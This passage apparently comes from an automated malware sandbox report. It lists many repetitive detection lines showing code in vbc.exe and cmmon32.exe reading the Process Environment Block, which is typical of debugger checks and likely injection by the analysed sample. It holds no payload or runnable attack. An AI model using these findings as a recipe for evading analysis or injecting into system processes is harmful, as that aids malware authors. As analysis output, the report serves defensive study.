Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe Code function: 4_2_0557E620 mov eax, dword ptr fs:[00000030h] 4_2_0557E620
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe Code function: 4_2_055A36CC mov eax, dword ptr fs:[00000030h] 4_2_055A36CC
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe Code function: 4_2_055B8EC7 mov eax, dword ptr fs:[00000030h] 4_2_055B8EC7
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe Code function: 4_2_0562FEC0 mov eax, dword ptr fs:[00000030h] 4_2_0562FEC0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe Code function: 4_2_05648ED6 mov eax, dword ptr fs:[00000030h] 4_2_05648ED6
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe Code function: 4_2_055A16E0 mov ecx, dword ptr fs:[00000030h] 4_2_055A16E0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe Code function: 4_2_055876E2 mov eax, dword ptr fs:[00000030h] 4_2_055876E2
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe Code function: 4_2_05640EA5 mov eax, dword ptr fs:[00000030h] 4_2_05640EA5
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe Code function: 4_2_05640EA5 mov eax, dword ptr fs:[00000030h] 4_2_05640EA5
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe Code function: 4_2_05640EA5 mov eax, dword ptr fs:[00000030h] 4_2_05640EA5
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe Code function: 4_2_0560FE87 mov eax, dword ptr fs:[00000030h] 4_2_0560FE87
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe Code function: 4_2_055F46A7 mov eax, dword ptr fs:[00000030h] 4_2_055F46A7
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe Code function: 4_2_0559B944 mov eax, dword ptr fs:[00000030h] 4_2_0559B944
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe Code function: 4_2_0559B944 mov eax, dword ptr fs:[00000030h] 4_2_0559B944
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe Code function: 4_2_0557B171 mov eax, dword ptr fs:[00000030h] 4_2_0557B171
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe Code function: 4_2_0557B171 mov eax, dword ptr fs:[00000030h] 4_2_0557B171
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe Code function: 4_2_0557C962 mov eax, dword ptr fs:[00000030h] 4_2_0557C962
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe Code function: 4_2_05579100 mov eax, dword ptr fs:[00000030h] 4_2_05579100
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe Code function: 4_2_05579100 mov eax, dword ptr fs:[00000030h] 4_2_05579100
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe Code function: 4_2_05579100 mov eax, dword ptr fs:[00000030h] 4_2_05579100
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe Code function: 4_2_055A513A mov eax, dword ptr fs:[00000030h] 4_2_055A513A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe Code function: 4_2_055A513A mov eax, dword ptr fs:[00000030h] 4_2_055A513A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe Code function: 4_2_05594120 mov eax, dword ptr fs:[00000030h] 4_2_05594120
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe Code function: 4_2_05594120 mov eax, dword ptr fs:[00000030h] 4_2_05594120
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe Code function: 4_2_05594120 mov eax, dword ptr fs:[00000030h] 4_2_05594120
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe Code function: 4_2_05594120 mov eax, dword ptr fs:[00000030h] 4_2_05594120
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe Code function: 4_2_05594120 mov ecx, dword ptr fs:[00000030h] 4_2_05594120
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe Code function: 4_2_056041E8 mov eax, dword ptr fs:[00000030h] 4_2_056041E8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe Code function: 4_2_0557B1E1 mov eax, dword ptr fs:[00000030h] 4_2_0557B1E1
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe Code function: 4_2_0557B1E1 mov eax, dword ptr fs:[00000030h] 4_2_0557B1E1
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe Code function: 4_2_0557B1E1 mov eax, dword ptr fs:[00000030h] 4_2_0557B1E1
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe Code function: 4_2_056349A4 mov eax, dword ptr fs:[00000030h] 4_2_056349A4
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe Code function: 4_2_056349A4 mov eax, dword ptr fs:[00000030h] 4_2_056349A4
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe Code function: 4_2_056349A4 mov eax, dword ptr fs:[00000030h] 4_2_056349A4
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe Code function: 4_2_056349A4 mov eax, dword ptr fs:[00000030h] 4_2_056349A4
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe Code function: 4_2_055A2990 mov eax, dword ptr fs:[00000030h] 4_2_055A2990
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe Code function: 4_2_0559C182 mov eax, dword ptr fs:[00000030h] 4_2_0559C182
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe Code function: 4_2_055AA185 mov eax, dword ptr fs:[00000030h] 4_2_055AA185
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe Code function: 4_2_055F51BE mov eax, dword ptr fs:[00000030h] 4_2_055F51BE
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe Code function: 4_2_055F51BE mov eax, dword ptr fs:[00000030h] 4_2_055F51BE
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe Code function: 4_2_055F51BE mov eax, dword ptr fs:[00000030h] 4_2_055F51BE
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe Code function: 4_2_055F51BE mov eax, dword ptr fs:[00000030h] 4_2_055F51BE
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe Code function: 4_2_055999BF mov ecx, dword ptr fs:[00000030h] 4_2_055999BF
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe Code function: 4_2_055999BF mov ecx, dword ptr fs:[00000030h] 4_2_055999BF
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe Code function: 4_2_055999BF mov eax, dword ptr fs:[00000030h] 4_2_055999BF
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe Code function: 4_2_055999BF mov ecx, dword ptr fs:[00000030h] 4_2_055999BF
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe Code function: 4_2_055999BF mov ecx, dword ptr fs:[00000030h] 4_2_055999BF
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe Code function: 4_2_055999BF mov eax, dword ptr fs:[00000030h] 4_2_055999BF
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe Code function: 4_2_055999BF mov ecx, dword ptr fs:[00000030h] 4_2_055999BF
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe Code function: 4_2_055999BF mov ecx, dword ptr fs:[00000030h] 4_2_055999BF
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe Code function: 4_2_055999BF mov eax, dword ptr fs:[00000030h] 4_2_055999BF
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe Code function: 4_2_055999BF mov ecx, dword ptr fs:[00000030h] 4_2_055999BF
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe Code function: 4_2_055999BF mov ecx, dword ptr fs:[00000030h] 4_2_055999BF
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe Code function: 4_2_055999BF mov eax, dword ptr fs:[00000030h] 4_2_055999BF
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe Code function: 4_2_055F69A6 mov eax, dword ptr fs:[00000030h] 4_2_055F69A6
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe Code function: 4_2_055A61A0 mov eax, dword ptr fs:[00000030h] 4_2_055A61A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe Code function: 4_2_055A61A0 mov eax, dword ptr fs:[00000030h] 4_2_055A61A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe Code function: 4_2_05590050 mov eax, dword ptr fs:[00000030h] 4_2_05590050
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe Code function: 4_2_05590050 mov eax, dword ptr fs:[00000030h] 4_2_05590050
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe Code function: 4_2_05632073 mov eax, dword ptr fs:[00000030h] 4_2_05632073
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe Code function: 4_2_05641074 mov eax, dword ptr fs:[00000030h] 4_2_05641074
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe Code function: 4_2_055F7016 mov eax, dword ptr fs:[00000030h] 4_2_055F7016
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe Code function: 4_2_055F7016 mov eax, dword ptr fs:[00000030h] 4_2_055F7016
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe Code function: 4_2_055F7016 mov eax, dword ptr fs:[00000030h] 4_2_055F7016
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe Code function: 4_2_0559A830 mov eax, dword ptr fs:[00000030h] 4_2_0559A830
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe Code function: 4_2_0559A830 mov eax, dword ptr fs:[00000030h] 4_2_0559A830
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe Code function: 4_2_0559A830 mov eax, dword ptr fs:[00000030h] 4_2_0559A830
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe Code function: 4_2_0559A830 mov eax, dword ptr fs:[00000030h] 4_2_0559A830
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe Code function: 4_2_05644015 mov eax, dword ptr fs:[00000030h] 4_2_05644015
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe Code function: 4_2_05644015 mov eax, dword ptr fs:[00000030h] 4_2_05644015
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe Code function: 4_2_0558B02A mov eax, dword ptr fs:[00000030h] 4_2_0558B02A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe Code function: 4_2_0558B02A mov eax, dword ptr fs:[00000030h] 4_2_0558B02A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe Code function: 4_2_0558B02A mov eax, dword ptr fs:[00000030h] 4_2_0558B02A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe Code function: 4_2_0558B02A mov eax, dword ptr fs:[00000030h] 4_2_0558B02A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe Code function: 4_2_055A002D mov eax, dword ptr fs:[00000030h] 4_2_055A002D
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe Code function: 4_2_055A002D mov eax, dword ptr fs:[00000030h] 4_2_055A002D
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe Code function: 4_2_055A002D mov eax, dword ptr fs:[00000030h] 4_2_055A002D
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe Code function: 4_2_055A002D mov eax, dword ptr fs:[00000030h] 4_2_055A002D
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe Code function: 4_2_055A002D mov eax, dword ptr fs:[00000030h] 4_2_055A002D
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe Code function: 4_2_0560B8D0 mov eax, dword ptr fs:[00000030h] 4_2_0560B8D0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe Code function: 4_2_0560B8D0 mov ecx, dword ptr fs:[00000030h] 4_2_0560B8D0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe Code function: 4_2_0560B8D0 mov eax, dword ptr fs:[00000030h] 4_2_0560B8D0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe Code function: 4_2_0560B8D0 mov eax, dword ptr fs:[00000030h] 4_2_0560B8D0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe Code function: 4_2_0560B8D0 mov eax, dword ptr fs:[00000030h] 4_2_0560B8D0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe Code function: 4_2_0560B8D0 mov eax, dword ptr fs:[00000030h] 4_2_0560B8D0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe Code function: 4_2_055740E1 mov eax, dword ptr fs:[00000030h] 4_2_055740E1
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe Code function: 4_2_055740E1 mov eax, dword ptr fs:[00000030h] 4_2_055740E1
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe Code function: 4_2_055740E1 mov eax, dword ptr fs:[00000030h] 4_2_055740E1
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe Code function: 4_2_055758EC mov eax, dword ptr fs:[00000030h] 4_2_055758EC
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe Code function: 4_2_0559B8E4 mov eax, dword ptr fs:[00000030h] 4_2_0559B8E4
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe Code function: 4_2_0559B8E4 mov eax, dword ptr fs:[00000030h] 4_2_0559B8E4
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe Code function: 4_2_05579080 mov eax, dword ptr fs:[00000030h] 4_2_05579080
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe Code function: 4_2_055F3884 mov eax, dword ptr fs:[00000030h] 4_2_055F3884
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe Code function: 4_2_055F3884 mov eax, dword ptr fs:[00000030h] 4_2_055F3884
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe Code function: 4_2_055AF0BF mov ecx, dword ptr fs:[00000030h] 4_2_055AF0BF
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe Code function: 4_2_055AF0BF mov eax, dword ptr fs:[00000030h] 4_2_055AF0BF
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe Code function: 4_2_055AF0BF mov eax, dword ptr fs:[00000030h] 4_2_055AF0BF
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe Code function: 4_2_055B90AF mov eax, dword ptr fs:[00000030h] 4_2_055B90AF
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe Code function: 4_2_055A20A0 mov eax, dword ptr fs:[00000030h] 4_2_055A20A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe Code function: 4_2_055A20A0 mov eax, dword ptr fs:[00000030h] 4_2_055A20A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe Code function: 4_2_055A20A0 mov eax, dword ptr fs:[00000030h] 4_2_055A20A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe Code function: 4_2_055A20A0 mov eax, dword ptr fs:[00000030h] 4_2_055A20A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe Code function: 4_2_055A20A0 mov eax, dword ptr fs:[00000030h] 4_2_055A20A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe Code function: 4_2_055A20A0 mov eax, dword ptr fs:[00000030h] 4_2_055A20A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe Code function: 4_2_0557F358 mov eax, dword ptr fs:[00000030h] 4_2_0557F358
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe Code function: 4_2_0557DB40 mov eax, dword ptr fs:[00000030h] 4_2_0557DB40
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe Code function: 4_2_055A3B7A mov eax, dword ptr fs:[00000030h] 4_2_055A3B7A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe Code function: 4_2_055A3B7A mov eax, dword ptr fs:[00000030h] 4_2_055A3B7A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe Code function: 4_2_0557DB60 mov ecx, dword ptr fs:[00000030h] 4_2_0557DB60
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe Code function: 4_2_05648B58 mov eax, dword ptr fs:[00000030h] 4_2_05648B58
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe Code function: 4_2_0563131B mov eax, dword ptr fs:[00000030h] 4_2_0563131B
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe Code function: 4_2_055F53CA mov eax, dword ptr fs:[00000030h] 4_2_055F53CA
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe Code function: 4_2_055F53CA mov eax, dword ptr fs:[00000030h] 4_2_055F53CA
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe Code function: 4_2_0559DBE9 mov eax, dword ptr fs:[00000030h] 4_2_0559DBE9
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe Code function: 4_2_055A03E2 mov eax, dword ptr fs:[00000030h] 4_2_055A03E2
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe Code function: 4_2_055A03E2 mov eax, dword ptr fs:[00000030h] 4_2_055A03E2
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe Code function: 4_2_055A03E2 mov eax, dword ptr fs:[00000030h] 4_2_055A03E2
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe Code function: 4_2_055A03E2 mov eax, dword ptr fs:[00000030h] 4_2_055A03E2
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe Code function: 4_2_055A03E2 mov eax, dword ptr fs:[00000030h] 4_2_055A03E2
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe Code function: 4_2_055A03E2 mov eax, dword ptr fs:[00000030h] 4_2_055A03E2
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe Code function: 4_2_05645BA5 mov eax, dword ptr fs:[00000030h] 4_2_05645BA5
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe Code function: 4_2_055AB390 mov eax, dword ptr fs:[00000030h] 4_2_055AB390
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe Code function: 4_2_055A2397 mov eax, dword ptr fs:[00000030h] 4_2_055A2397
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe Code function: 4_2_05581B8F mov eax, dword ptr fs:[00000030h] 4_2_05581B8F
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe Code function: 4_2_05581B8F mov eax, dword ptr fs:[00000030h] 4_2_05581B8F
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe Code function: 4_2_0562D380 mov ecx, dword ptr fs:[00000030h] 4_2_0562D380
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe Code function: 4_2_0563138A mov eax, dword ptr fs:[00000030h] 4_2_0563138A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe Code function: 4_2_055A4BAD mov eax, dword ptr fs:[00000030h] 4_2_055A4BAD
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe Code function: 4_2_055A4BAD mov eax, dword ptr fs:[00000030h] 4_2_055A4BAD
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe Code function: 4_2_055A4BAD mov eax, dword ptr fs:[00000030h] 4_2_055A4BAD
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe Code function: 4_2_0562B260 mov eax, dword ptr fs:[00000030h] 4_2_0562B260
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe Code function: 4_2_0562B260 mov eax, dword ptr fs:[00000030h] 4_2_0562B260
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe Code function: 4_2_05648A62 mov eax, dword ptr fs:[00000030h] 4_2_05648A62
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe Code function: 4_2_05579240 mov eax, dword ptr fs:[00000030h] 4_2_05579240
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe Code function: 4_2_05579240 mov eax, dword ptr fs:[00000030h] 4_2_05579240
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe Code function: 4_2_05579240 mov eax, dword ptr fs:[00000030h] 4_2_05579240
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe Code function: 4_2_05579240 mov eax, dword ptr fs:[00000030h] 4_2_05579240
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe Code function: 4_2_055B927A mov eax, dword ptr fs:[00000030h] 4_2_055B927A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe Code function: 4_2_0563EA55 mov eax, dword ptr fs:[00000030h] 4_2_0563EA55
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe Code function: 4_2_05604257 mov eax, dword ptr fs:[00000030h] 4_2_05604257
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe Code function: 4_2_0557AA16 mov eax, dword ptr fs:[00000030h] 4_2_0557AA16
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe Code function: 4_2_0557AA16 mov eax, dword ptr fs:[00000030h] 4_2_0557AA16
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe Code function: 4_2_05593A1C mov eax, dword ptr fs:[00000030h] 4_2_05593A1C
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe Code function: 4_2_05575210 mov eax, dword ptr fs:[00000030h] 4_2_05575210
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe Code function: 4_2_05575210 mov ecx, dword ptr fs:[00000030h] 4_2_05575210
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe Code function: 4_2_05575210 mov eax, dword ptr fs:[00000030h] 4_2_05575210
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe Code function: 4_2_05575210 mov eax, dword ptr fs:[00000030h] 4_2_05575210
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe Code function: 4_2_05588A0A mov eax, dword ptr fs:[00000030h] 4_2_05588A0A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe Code function: 4_2_0559A229 mov eax, dword ptr fs:[00000030h] 4_2_0559A229
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe Code function: 4_2_0559A229 mov eax, dword ptr fs:[00000030h] 4_2_0559A229
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe Code function: 4_2_0559A229 mov eax, dword ptr fs:[00000030h] 4_2_0559A229
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe Code function: 4_2_0559A229 mov eax, dword ptr fs:[00000030h] 4_2_0559A229
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe Code function: 4_2_0559A229 mov eax, dword ptr fs:[00000030h] 4_2_0559A229
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe Code function: 4_2_0559A229 mov eax, dword ptr fs:[00000030h] 4_2_0559A229
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe Code function: 4_2_0559A229 mov eax, dword ptr fs:[00000030h] 4_2_0559A229
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe Code function: 4_2_0559A229 mov eax, dword ptr fs:[00000030h] 4_2_0559A229
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe Code function: 4_2_0559A229 mov eax, dword ptr fs:[00000030h] 4_2_0559A229
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe Code function: 4_2_0563AA16 mov eax, dword ptr fs:[00000030h] 4_2_0563AA16
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe Code function: 4_2_0563AA16 mov eax, dword ptr fs:[00000030h] 4_2_0563AA16
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe Code function: 4_2_055B4A2C mov eax, dword ptr fs:[00000030h] 4_2_055B4A2C
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe Code function: 4_2_055B4A2C mov eax, dword ptr fs:[00000030h] 4_2_055B4A2C
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe Code function: 4_2_055A2ACB mov eax, dword ptr fs:[00000030h] 4_2_055A2ACB
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe Code function: 4_2_055A2AE4 mov eax, dword ptr fs:[00000030h] 4_2_055A2AE4
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe Code function: 4_2_055AD294 mov eax, dword ptr fs:[00000030h] 4_2_055AD294
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe Code function: 4_2_055AD294 mov eax, dword ptr fs:[00000030h] 4_2_055AD294
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe Code function: 4_2_0558AAB0 mov eax, dword ptr fs:[00000030h] 4_2_0558AAB0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe Code function: 4_2_0558AAB0 mov eax, dword ptr fs:[00000030h] 4_2_0558AAB0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe Code function: 4_2_055AFAB0 mov eax, dword ptr fs:[00000030h] 4_2_055AFAB0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe Code function: 4_2_055752A5 mov eax, dword ptr fs:[00000030h] 4_2_055752A5
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe Code function: 4_2_055752A5 mov eax, dword ptr fs:[00000030h] 4_2_055752A5
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe Code function: 4_2_055752A5 mov eax, dword ptr fs:[00000030h] 4_2_055752A5
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe Code function: 4_2_055752A5 mov eax, dword ptr fs:[00000030h] 4_2_055752A5
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe Code function: 4_2_055752A5 mov eax, dword ptr fs:[00000030h] 4_2_055752A5
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 17_2_04A6849B mov eax, dword ptr fs:[00000030h] 17_2_04A6849B
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 17_2_04B114FB mov eax, dword ptr fs:[00000030h] 17_2_04B114FB
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 17_2_04AD6CF0 mov eax, dword ptr fs:[00000030h] 17_2_04AD6CF0
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 17_2_04AD6CF0 mov eax, dword ptr fs:[00000030h] 17_2_04AD6CF0
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 17_2_04AD6CF0 mov eax, dword ptr fs:[00000030h] 17_2_04AD6CF0
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 17_2_04B28CD6 mov eax, dword ptr fs:[00000030h] 17_2_04B28CD6
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 17_2_04A8BC2C mov eax, dword ptr fs:[00000030h] 17_2_04A8BC2C
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 17_2_04AD6C0A mov eax, dword ptr fs:[00000030h] 17_2_04AD6C0A
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 17_2_04AD6C0A mov eax, dword ptr fs:[00000030h] 17_2_04AD6C0A
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 17_2_04AD6C0A mov eax, dword ptr fs:[00000030h] 17_2_04AD6C0A
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 17_2_04AD6C0A mov eax, dword ptr fs:[00000030h] 17_2_04AD6C0A
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 17_2_04B11C06 mov eax, dword ptr fs:[00000030h] 17_2_04B11C06
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 17_2_04B11C06 mov eax, dword ptr fs:[00000030h] 17_2_04B11C06
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 17_2_04B11C06 mov eax, dword ptr fs:[00000030h] 17_2_04B11C06
